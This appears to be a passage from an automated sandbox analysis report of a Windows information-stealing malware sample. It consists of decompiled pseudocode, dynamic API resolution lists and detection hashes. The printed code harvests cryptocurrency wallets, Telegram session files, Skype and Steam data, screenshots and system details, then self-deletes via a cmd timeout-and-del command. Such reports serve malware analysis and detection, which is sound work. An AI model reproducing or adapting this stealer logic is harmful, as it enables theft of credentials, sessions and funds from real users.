				 *0x41c73c = GetProcAddress( *0x41c708, "CryptAcquireContextA");
				 *0x41c740 = GetProcAddress( *0x41c708, "CryptCreateHash");
				 *0x41c744 = GetProcAddress( *0x41c708, "CryptHashData");
				 *0x41c748 = GetProcAddress( *0x41c708, "CryptGetHashParam");
				 *0x41c74c = GetProcAddress( *0x41c708, "CryptDestroyHash");
				 *0x41c750 = GetProcAddress( *0x41c708, "CryptReleaseContext");
				 *0x41c754 = LoadLibraryA("user32.dll");
				_t110 =  *0x41c754; // 0x74ea0000
				 *0x41c758 = GetProcAddress(_t110, "EnumDisplayDevicesW");
				_t112 =  *0x41c754; // 0x74ea0000
				 *0x41c75c = GetProcAddress(_t112, "wvsprintfA");
				_t114 =  *0x41c754; // 0x74ea0000
				 *0x41c760 = GetProcAddress(_t114, "GetKeyboardLayoutList");
				_t116 = LoadLibraryA("shell32.dll"); // executed
				 *0x41c764 = _t116;
				_t117 =  *0x41c764; // 0x75ed0000
				 *0x41c768 = GetProcAddress(_t117, "ShellExecuteExW");
				 *0x41c76c = LoadLibraryA("ntdll.dll");
				_t120 =  *0x41c76c; // 0x779c0000
				_t121 = GetProcAddress(_t120, "RtlComputeCrc32");
				 *0x41c770 = _t121;
				return _t121;
			}










                                                                                                                                                                                              0x00405632
                                                                                                                                                                                              0x00405641
                                                                                                                                                                                              0x00405653
                                                                                                                                                                                              0x00405665
                                                                                                                                                                                              0x00405677
                                                                                                                                                                                              0x00405689
                                                                                                                                                                                              0x0040569b
                                                                                                                                                                                              0x004056ad
                                                                                                                                                                                              0x004056bf
                                                                                                                                                                                              0x004056d1
                                                                                                                                                                                              0x004056e3
                                                                                                                                                                                              0x004056f5
                                                                                                                                                                                              0x00405707
                                                                                                                                                                                              0x00405719
                                                                                                                                                                                              0x0040572b
                                                                                                                                                                                              0x0040573d
                                                                                                                                                                                              0x0040574f
                                                                                                                                                                                              0x00405761
                                                                                                                                                                                              0x00405773
                                                                                                                                                                                              0x00405785
                                                                                                                                                                                              0x00405797
                                                                                                                                                                                              0x004057a9
                                                                                                                                                                                              0x004057bb
                                                                                                                                                                                              0x004057cd
                                                                                                                                                                                              0x004057df
                                                                                                                                                                                              0x004057f1
                                                                                                                                                                                              0x00405803
                                                                                                                                                                                              0x00405815
                                                                                                                                                                                              0x00405827
                                                                                                                                                                                              0x00405839
                                                                                                                                                                                              0x0040584b
                                                                                                                                                                                              0x0040585d
                                                                                                                                                                                              0x0040586f
                                                                                                                                                                                              0x00405881
                                                                                                                                                                                              0x00405893
                                                                                                                                                                                              0x004058a5
                                                                                                                                                                                              0x004058b4
                                                                                                                                                                                              0x004058c3
                                                                                                                                                                                              0x004058d5
                                                                                                                                                                                              0x004058e7
                                                                                                                                                                                              0x004058f9
                                                                                                                                                                                              0x0040590b
                                                                                                                                                                                              0x0040591d
                                                                                                                                                                                              0x0040592f
                                                                                                                                                                                              0x00405941
                                                                                                                                                                                              0x00405953
                                                                                                                                                                                              0x00405965
                                                                                                                                                                                              0x00405977
                                                                                                                                                                                              0x00405989
                                                                                                                                                                                              0x0040599b
                                                                                                                                                                                              0x004059ad
                                                                                                                                                                                              0x004059bf
                                                                                                                                                                                              0x004059d1
                                                                                                                                                                                              0x004059e3
                                                                                                                                                                                              0x004059f5
                                                                                                                                                                                              0x00405a04
                                                                                                                                                                                              0x00405a0e
                                                                                                                                                                                              0x00405a19
                                                                                                                                                                                              0x00405a23
                                                                                                                                                                                              0x00405a2e
                                                                                                                                                                                              0x00405a38
                                                                                                                                                                                              0x00405a43
                                                                                                                                                                                              0x00405a4d
                                                                                                                                                                                              0x00405a52
                                                                                                                                                                                              0x00405a5c
                                                                                                                                                                                              0x00405a67
                                                                                                                                                                                              0x00405a76
                                                                                                                                                                                              0x00405a80
                                                                                                                                                                                              0x00405a86
                                                                                                                                                                                              0x00405a8b
                                                                                                                                                                                              0x00405a92

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00419155), ref: 0040562D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 0040563C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040564E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 00405660
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00405672
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00405684
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00405696
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056A8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 004056BA
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 004056CC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 004056DE
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004056F0
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 00405702
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405714
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00405726
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405738
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 0040574A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 0040575C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0040576E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 00405780
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 00405792
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057A4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057B6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004057C8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004057DA
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004057EC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 004057FE
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00405810
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 00405822
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 00405834
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405846
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405858
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040586A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 0040587C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 0040588E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058A0
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058AF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058BE
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 004058D0
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 004058E2
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 004058F4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405906
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405918
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 0040592A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0040593C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040594E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 00405960
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 00405972
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 00405984
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00405996
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059A8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059BA
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004059CC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004059DE
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004059F0
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 004059FF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EA0000,EnumDisplayDevicesW), ref: 00405A14
                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EA0000,wvsprintfA), ref: 00405A29
                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EA0000,GetKeyboardLayoutList), ref: 00405A3E
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(shell32.dll,74EA0000,GetKeyboardLayoutList,74EA0000,wvsprintfA,74EA0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A4D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(75ED0000,ShellExecuteExW), ref: 00405A62
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll,75ED0000,ShellExecuteExW,shell32.dll,74EA0000,GetKeyboardLayoutList,74EA0000,wvsprintfA,74EA0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405A71
                                                                                                                                                                                              • GetProcAddress.KERNEL32(779C0000,RtlComputeCrc32), ref: 00405A86
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                              • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                                                                                                                                                                                              • API String ID: 2238633743-617434850
                                                                                                                                                                                              • Opcode ID: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
                                                                                                                                                                                              • Instruction ID: cfd24dbd3a5623e96a1366eeff91a6eabf16f5ed4c2f56b33555d19b2fe062a0
                                                                                                                                                                                              • Opcode Fuzzy Hash: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
                                                                                                                                                                                              • Instruction Fuzzy Hash: AEC174B1A80710ABDB01EFA5DC8AA6A37A8FB45705360953BB544FF2D1D678DC018F9C
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00419108, Relevance: 57.0, APIs: 4, Strings: 28, Instructions: 964synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                              			E00419108(char __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				void* _v56;
				char _v60;
				char _v64;
				signed int _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v88;
				char* _v92;
				char _v96;
				char _v100;
				char* _v104;
				void* _v108;
				char _v112;
				char _v241;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				char _v304;
				char _v308;
				char _v312;
				intOrPtr _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				void* _v344;
				void* _v348;
				void* _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				char _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				intOrPtr _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				void* _t446;
				void* _t452;
				intOrPtr* _t453;
				intOrPtr _t546;
				intOrPtr* _t616;
				intOrPtr* _t623;
				intOrPtr* _t630;
				intOrPtr* _t637;
				intOrPtr _t651;
				intOrPtr* _t654;
				intOrPtr* _t657;
				intOrPtr* _t660;
				intOrPtr* _t663;
				intOrPtr _t668;
				intOrPtr* _t671;
				void* _t677;
				intOrPtr* _t714;
				intOrPtr _t756;
				signed int _t806;
				intOrPtr* _t827;
				intOrPtr* _t830;
				signed int _t837;
				signed int _t884;
				intOrPtr _t907;
				int _t920;
				intOrPtr* _t932;
				void* _t954;
				signed int _t955;
				signed int _t956;
				void* _t957;
				void* _t975;
				intOrPtr _t983;
				intOrPtr _t1001;
				intOrPtr* _t1045;
				intOrPtr* _t1072;
				void* _t1094;
				void* _t1102;
				void* _t1132;
				void* _t1134;
				void* _t1135;
				signed int _t1137;
				intOrPtr _t1140;
				intOrPtr _t1141;
				void* _t1146;
				void* _t1167;
				void* _t1173;
				void* _t1181;
				void* _t1183;

				_t1183 = __fp0;
				_t1130 = __edi;
				_t1140 = _t1141;
				_t957 = 0x51;
				do {
					_push(0);
					_push(0);
					_t957 = _t957 - 1;
					_t1142 = _t957;
				} while (_t957 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t1140);
				_push(0x41a13a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1141;
				E004034E4( &_v72);
				_v82 = 0;
				_v81 = 0;
				E0040357C( &_v88, 0x41a158);
				E0040561C();
				E00407D24( &_v308, _t1142);
				_push( &_v308);
				E00406C4C( &_v312, __ebx, __esi); // executed
				_pop(_t446);
				E00403798(_t446, _v312);
				_t452 = CreateMutexA(0, 0, E00403990(_v308)); // executed
				_v108 = _t452;
				_t453 =  *0x41b558; // 0x41c6a4
				if( *((intOrPtr*)( *_t453))() == 0xb7) {
					L68:
					_pop(_t983);
					 *[fs:eax] = _t983;
					_push(E0041A144);
					E004034E4( &_v652);
					E00403B98( &_v648, 2);
					E004034E4( &_v640);
					E00403B98( &_v636, 5);
					E00403508( &_v616, 0xa);
					E00403B80( &_v576);
					E00403508( &_v572, 2);
					E00403B80( &_v564);
					E00403508( &_v560, 2);
					E00403B80( &_v552);
					E00403508( &_v548, 2);
					E00403B80( &_v540);
					E00403508( &_v536, 2);
					E00403B80( &_v528);
					E00403508( &_v524, 2);
					E00403B80( &_v516);
					E00403508( &_v512, 2);
					E00403B80( &_v504);
					E00403508( &_v500, 2);
					E00403B80( &_v492);
					E00403508( &_v488, 0xa);
					E00403B98( &_v448, 2);
					E004034E4( &_v440);
					E00403B98( &_v436, 3);
					E004034E4( &_v424);
					E00403B98( &_v420, 2);
					E004034E4( &_v412);
					E00403B98( &_v408, 8);
					E004034E4( &_v376);
					E00403B98( &_v372, 4);
					E00403508( &_v356, 0xd);
					_t1001 =  *0x405f2c; // 0x405f30
					E00404224( &_v60, 5, _t1001);
					E00403508( &_v40, 7);
					E004034E4( &_v8);
					E004034E4( &_v112);
					E00403508( &_v104, 5);
					E00403508( &_v80, 3);
					return E004034E4( &_v64);
				} else {
					E004034E4( &_v112);
					_t954 = 0x44d;
					_t1137 = 0x41b0fc;
					while( *_t1137 != 0) {
						E004036CC();
						E00403798( &_v112, _v316);
						_t1137 = _t1137 + 1;
						_t954 = _t954 - 1;
						if(_t954 != 0) {
							continue;
						}
						break;
					}
					E00418F9C(_v112, _t954, _t957, _t1130, _t1137);
					E00406C4C( &_v324, _t954, _t1137); // executed
					E00406810(_v324, _t954, _t957,  &_v320, _t1130, _t1137);
					E004037DC( &_v32, _v320, _v88);
					E004176D8( &_v32, _t954, 0x80000, _v88, _t1130, _t1137);
					_t546 =  *0x41c8c0; // 0x0, executed
					E00418688(_t546, _t954, _v32, _t1130, _t1137,  &_v16); // executed
					E004176D8( &_v16, _t954, 0x80000, _v88, _t1130, _t1137);
					_t1146 = E00403790(_v16) - 0x2710;
					if(_t1146 < 0) {
						goto L68;
					}
					E004038DC(_v16, 0x41a164);
					if(_t1146 == 0) {
						goto L68;
					}
					E00407428(0x41a184, _t954, 0x41a174, _v16, _t1137,  &_v328);
					E00406984(_v328, _t954,  &_v36, _t1130, _t1137);
					E00407428(0x41a1a0, _t954, 0x41a190, _v16, _t1137,  &_v332);
					E00406AE4(_v332, _t954,  &_v40, _t1130, _t1137);
					E0040795C(0x41a1ac,  &_v44, _v36, _t1146);
					_t968 = 0x41a1b8;
					E00407428(0x41a1c8, _t954, 0x41a1b8, _v16, _t1137,  &_v340);
					_t1017 =  &_v336;
					E00406984(_v340, _t954,  &_v336, _t1130, _t1137);
					E004080C4(_v336, _t1146);
					E00408328(_v40, _t954,  &_v336, _t1130, _t1137);
					E0040DC44();
					_t1132 = E004045EC(_v44) - 1;
					if(_t1132 < 0) {
						L48:
						_push(_v8);
						_push(0x41a1ac);
						E00417290( &_v464, _t954, _t1017, _t1132, _t1137);
						_push(_v464);
						E00403850();
						E0040DCE8(_v460, _t954, "System.txt", _t1132, _t1137);
						E00406C4C( &_v472, _t954, _t1137);
						E00406810(_v472, _t954, _t968,  &_v468, _t1132, _t1137);
						_push(_v468);
						_push(0x41a3e8);
						E00407A4C( &_v480, _t954, _t1132, _t1137);
						E00406810(_v480, _t954, _t968,  &_v476, _t1132, _t1137);
						_push(_v476);
						_push(0x41a3e8);
						E00406BB4( &_v492);
						E0040377C( &_v488, _v492);
						E00406810(_v488, _t954, _t968,  &_v484, _t1132, _t1137);
						_push(_v484);
						_push(0x41a3e8);
						E004066C0( &_v504, _t1168);
						E0040377C( &_v500, _v504);
						E00406810(_v500, _t954, _t968,  &_v496, _t1132, _t1137);
						_push(_v496);
						_push(0x41a3e8);
						E00406610( &_v516);
						E0040377C( &_v512, _v516);
						E00406810(_v512, _t954, _t968,  &_v508, _t1132, _t1137);
						_push(_v508);
						_push(0x41a3e8);
						E004065CC( &_v528);
						E0040377C( &_v524, _v528);
						E00406810(_v524, _t954, _t968,  &_v520, _t1132, _t1137);
						_push(_v520);
						_push(0x41a3e8);
						_t616 =  *0x41b5b8; // 0x41b0b8
						E00406FDC( *_t616, _t954,  &_v540, _t1137, _t1168);
						E0040377C( &_v536, _v540);
						E00406810(_v536, _t954, _t968,  &_v532, _t1132, _t1137);
						_push(_v532);
						_push(0x41a3e8);
						_t623 =  *0x41b5c4; // 0x41b0b0
						E00406FDC( *_t623, _t954,  &_v552, _t1137, _t1168);
						E0040377C( &_v548, _v552);
						E00406810(_v548, _t954, _t968,  &_v544, _t1132, _t1137);
						_push(_v544);
						_push(0x41a3e8);
						_t630 =  *0x41b584; // 0x41b0b4
						E00406FDC( *_t630, _t954,  &_v564, _t1137, _t1168);
						E0040377C( &_v560, _v564);
						E00406810(_v560, _t954, _t968,  &_v556, _t1132, _t1137);
						_push(_v556);
						_push(0x41a3e8);
						_t637 =  *0x41b638; // 0x41b0ac
						E00406FDC( *_t637, _t954,  &_v576, _t1137, _t1168);
						E0040377C( &_v572, _v576);
						E00406810(_v572, _t954, _t968,  &_v568, _t1132, _t1137);
						_push(_v568);
						_push(0x41a3e8);
						E00406810(_v8, _t954, _t968,  &_v580, _t1132, _t1137);
						_push(_v580);
						_push(0x41a3e8);
						E00407D24( &_v588, _t1168);
						E00406810(_v588, _t954, _t968,  &_v584, _t1132, _t1137);
						_push(_v584);
						E00403850();
						_t651 =  *0x41b5f4; // 0x41b0bc
						_t1045 =  *0x41b5f4; // 0x41b0bc
						E00403798(_t651,  *_t1045);
						_push(_v24);
						_t654 =  *0x41b5f4; // 0x41b0bc
						_push( *_t654);
						E004063A4( &_v592, _t954, _t1132, _t1137);
						_push(_v592);
						_t657 =  *0x41b5f4; // 0x41b0bc
						_push( *_t657);
						E0040653C( &_v596, _t954, _t968, _t1132, _t1137);
						_push(_v596);
						_t660 =  *0x41b5f4; // 0x41b0bc
						_push( *_t660);
						E0040DEE4( &_v600, _t954, _t1168);
						_push(_v600);
						_t663 =  *0x41b5f4; // 0x41b0bc
						_push( *_t663);
						E00403850();
						_t1169 = _v81 - 1;
						if(_v81 == 1) {
							_push(_v76);
							_push(0x41a3b8);
							_push(_v80);
							E00403850();
							E00403798( &_v20, _v604);
						}
						E004176D8( &_v20, _t954, 0x80000, _v88, _t1132, _t1137);
						_t970 = 0;
						_t668 =  *0x41c8c0; // 0x0
						E00418688(_t668, _t954, _v20, _t1132, _t1137,  &_v608);
						_t671 =  *0x41b60c; // 0x41c6a0
						 *((intOrPtr*)( *_t671))(_v108);
						E004050C8(0x41a3f4, _t954, _t1132, _t1137, _t1169);
						_t677 = E00403790(_v72);
						_t1170 = _t677 - 3;
						if(_t677 <= 3) {
							L62:
							E004087DC(_t954, _t1137);
							E00407D24( &_v616, _t1181);
							E004038DC(_v616, 0x41a424);
							if(_t1181 != 0) {
								L65:
								E004038DC(_v8, 0x41a430);
								if(__eflags == 0) {
									__eflags = _v82 - 1;
									if(_v82 == 1) {
										E004028E0( &_v304, 0x3c);
										_v304 = 0x3c;
										_v300 = 0x1c0;
										_v296 = 0;
										_v292 = 0;
										E004062D8(L"%comspec%",  &_v620, __eflags);
										_v288 = E00403D3C(_v620);
										E004062D8(L"/c %WINDIR%\\system32\\timeout.exe 3 & del \"",  &_v628, __eflags);
										E00402754(0,  &_v640);
										E00403D2C( &_v636, _v640);
										E0040770C(_v636, _t954, 0,  &_v632, _t1137, __eflags);
										E00403E1C();
										_v284 = E00403D3C(_v624);
										E00402754(0,  &_v652);
										E00403D2C( &_v648, _v652);
										E00407798(_v648, _t954, 0,  &_v644, _t1137, __eflags);
										_v280 = E00403D3C(_v644);
										__eflags = 0;
										_v276 = 0;
										_t714 =  *0x41b564; // 0x41c768
										 *((intOrPtr*)( *_t714))( &_v304, E0041A4AC, _v632, _v628);
										ExitProcess(0);
									}
								}
								goto L68;
							}
							E004038DC(_v8, 0x41a430);
							if(_t1181 != 0) {
								goto L65;
							}
							E00407DD4(_t954, _t970, _t1132, _t1137, _t1181);
							goto L68;
						} else {
							_t970 =  &_v52;
							E0040795C(0x41a1ac,  &_v52, _v72, _t1170);
							_t1132 = E004045EC(_v52) - 1;
							if(_t1132 < 0) {
								goto L62;
							}
							_t1134 = _t1132 + 1;
							_t955 = 0;
							do {
								_push(0);
								E004047A8();
								_t1141 = _t1141 + 4;
								_t970 =  &_v56;
								E0040795C(0x41a2dc,  &_v56,  *((intOrPtr*)(_v52 + _t955 * 4)), 0);
								_t1173 = E004045EC(_v56) - 4;
								if(_t1173 != 0) {
									goto L61;
								}
								E004038DC( *_v56, 0x41a400);
								if(_t1173 != 0) {
									goto L61;
								}
								_t970 =  &_v60;
								E0040795C(0x41a40c,  &_v60,  *((intOrPtr*)(_v56 + 0xc)), _t1173);
								_v83 = 0;
								_t1137 = E004045EC(_v60) - 1;
								if(_t1137 < 0) {
									L59:
									_t1179 = _v83 - 1;
									if(_v83 == 1) {
										E004038DC( *((intOrPtr*)(_v56 + 8)), 0x41a418);
										E00418CF4( *((intOrPtr*)(_v56 + 4)), _t955, 0x41a400 | _t1179 == 0x00000000, _t1134, _t1137);
									}
									goto L61;
								}
								_t1137 = _t1137 + 1;
								_v68 = 0;
								while(1) {
									E00406318( *((intOrPtr*)(_v60 + _v68 * 4)), _t955,  &_v612, _t1134, _t1137);
									_t1072 =  *0x41b568; // 0x41c66c
									_v83 = E00403A78(_v612,  *_t1072) != 0;
									if(_v83 == 1) {
										goto L59;
									}
									_v68 = _v68 + 1;
									_t1137 = _t1137 - 1;
									if(_t1137 != 0) {
										continue;
									}
									goto L59;
								}
								goto L59;
								L61:
								_t955 = _t955 + 1;
								_t1134 = _t1134 - 1;
								_t1181 = _t1134;
							} while (_t1181 != 0);
							goto L62;
						}
					} else {
						_t1135 = _t1132 + 1;
						_t956 = 0;
						do {
							if(E00403790( *((intOrPtr*)(_v44 + _t956 * 4))) < 5) {
								goto L47;
							}
							if(_t956 == 0) {
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 9)) == 0x2b) {
									E00414098();
								}
								_t907 =  *((intOrPtr*)(_v44 + _t956 * 4));
								_t1154 =  *((char*)(_t907 + 3)) - 0x2b;
								if( *((char*)(_t907 + 3)) == 0x2b) {
									E00415EA8(L"Coins", _t956, _t968, _t1017, _t1135, _t1137, _t1154);
									_t932 =  *0x41b5c4; // 0x41b0b0
									_t1155 =  *_t932;
									if( *_t932 > 0) {
										E004050C8(0x41a200, _t956, _t1135, _t1137, _t1155);
									}
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 4)) == 0x2b) {
									E00414CB8(L"Skype", _t956, _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 5)) == 0x2b) {
									_t968 = L"Telegram";
									_t1017 = L"D877F783D5*,map*";
									E00414408(L"%appdata%\\Telegram Desktop\\tdata\\", _t956, L"Telegram", L"D877F783D5*,map*", _t1135, _t1137, 0, 0, 1, 0x3e8, 0);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 6)) == 0x2b) {
									E00414F40(L"Steam", _t956, _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 7)) == 0x2b) {
									_push(0);
									_push(0x32);
									_push(L"image/jpeg");
									_push( &_v64);
									_push(GetSystemMetrics(1));
									_t920 = GetSystemMetrics(0);
									_t968 = 0;
									_pop(_t1094);
									E004178B4(_t920, _t956, 0, _t1094, _t1135, _t1137);
									_t1017 = "scr.jpg";
									E0040DCE8(_v64, _t956, "scr.jpg", _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 8)) == 0x2b) {
									_v82 = 1;
								}
							}
							_t756 = _v44;
							_t1162 =  *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) - 0x46;
							if( *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) != 0x46) {
								L41:
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) == 0x4c) {
									_push(_v72);
									_push( *((intOrPtr*)(_v44 + _t956 * 4)));
									_push(0x41a1ac);
									_t1017 = 3;
									E00403850();
								}
